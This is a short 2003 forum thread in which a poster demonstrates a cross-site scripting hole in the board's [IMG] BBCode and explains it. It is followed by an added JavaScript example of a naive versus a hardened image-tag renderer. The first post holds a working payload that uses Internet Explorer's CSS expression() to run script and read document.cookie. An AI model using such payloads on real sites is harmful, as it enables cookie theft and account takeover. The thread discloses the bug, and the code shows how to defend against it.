| 10-22-2003, 10:02 AM | #1 |
[IMG]" style="color:expression(eval(this.parentElement.getElementsByTagName('b')[0].innerHTML))[/IMG]this.parentElement.style.cssText='background-color:yellow; font-weight:800; font-style:italic; color:black;'; this.parentElement.innerHTML='your cookie: '+document.cookie; |
| 10-22-2003, 10:31 AM | #2 |
Hmm, we knew about this... thought it was fixed... I guess it isn't :) |
| 10-22-2003, 10:35 AM | #3 |
Yeah well, I'm a friend of one of the guys who runs this board so I thought I'd see if it was hackable at all. The java[tab]script: protocol problem was fixed, this is an entirely new one. It seems IE allows for 'expression([javascript])' in CSS stylesheets to make them scriptable. So by injecting an inline stylesheet in an img tag I was able to execute some javascript that reads the cookie :) |
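
The attribute breakout described in post #3, shown from the board's side as an added example that is not part of the original thread or the forum software's own code: a naive [IMG] renderer next to one that allowlists the URL and escapes it before it reaches the `src` attribute. The function names and the sample input are assumptions made for illustration.

```javascript
// Added example (hypothetical names): rendering [IMG]...[/IMG] BBCode
// without letting the URL break out of the src attribute.
const IMG_TAG = /\[IMG\]([\s\S]*?)\[\/IMG\]/gi;

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Naive renderer: the URL is pasted into the attribute unescaped, so a
// double quote in it ends src="" and starts a new attribute such as style.
function renderImgNaive(text) {
  return text.replace(IMG_TAG, (_, url) => `<img src="${url}">`);
}

// Returns a normalized http(s) URL, or null if the value is not acceptable.
function safeImageUrl(raw) {
  // Reject control characters, whitespace, quotes and angle brackets outright
  // (this also covers a tab placed inside the scheme, as in java[tab]script:).
  if (/[\u0000-\u0020\u007f"'<>`\\]/.test(raw)) return null;
  let u;
  try { u = new URL(raw); } catch { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return u.href;
}

// Hardened renderer: allowlist the URL, then escape it for the attribute.
// Anything that fails validation is emitted as inert, escaped text.
function renderImgSafe(text) {
  let out = '';
  let last = 0;
  for (const m of text.matchAll(IMG_TAG)) {
    out += escapeHtml(text.slice(last, m.index));
    const url = safeImageUrl(m[1]);
    out += url ? `<img src="${escapeHtml(url)}" alt="">` : escapeHtml(m[0]);
    last = m.index + m[0].length;
  }
  return out + escapeHtml(text.slice(last));
}

// Constructed sample input modelled on post #1 (not the full posted string).
const SAMPLE = '[IMG]" style="color:expression(x)[/IMG]';
```

With `SAMPLE`, `renderImgNaive` emits an `<img>` carrying a `style` attribute, while `renderImgSafe` emits no tag at all and shows the BBCode as escaped text.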
